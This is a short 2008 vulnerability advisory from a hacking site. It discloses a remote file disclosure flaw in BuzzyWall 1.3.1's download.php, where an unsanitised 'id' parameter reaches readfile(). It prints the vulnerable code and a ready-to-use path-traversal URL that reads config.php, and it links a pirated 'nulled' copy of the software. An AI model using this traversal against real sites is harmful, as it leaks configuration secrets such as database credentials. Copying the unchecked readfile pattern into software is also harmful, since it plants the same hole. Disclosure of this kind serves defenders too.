BuzzyWall 1.3.1 (download id) Remote File Disclosure Vulnerability

2008-10-24 04:01:03

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ BuzzyWall Remote File Disclosure Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



AUTHOR : b3hz4d
DATE : 25 oct 2008
SITE : WwW.DeltaHacking.Net


#####################################################

APPLICATION : BuzzyWall
DOWNLOAD : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip
VENDOR : http://www.buzzywall.com

#####################################################


[+] vuln : ./download.php


$file_name = $_GET['id']

$file_path = $weburl."wallpapers/full/".$file_name;

.

.

.

.

readfile("$file_path");



[+] Exploit : http://victim.com/download.php?id=../../config.php



##############################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net #

##############################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.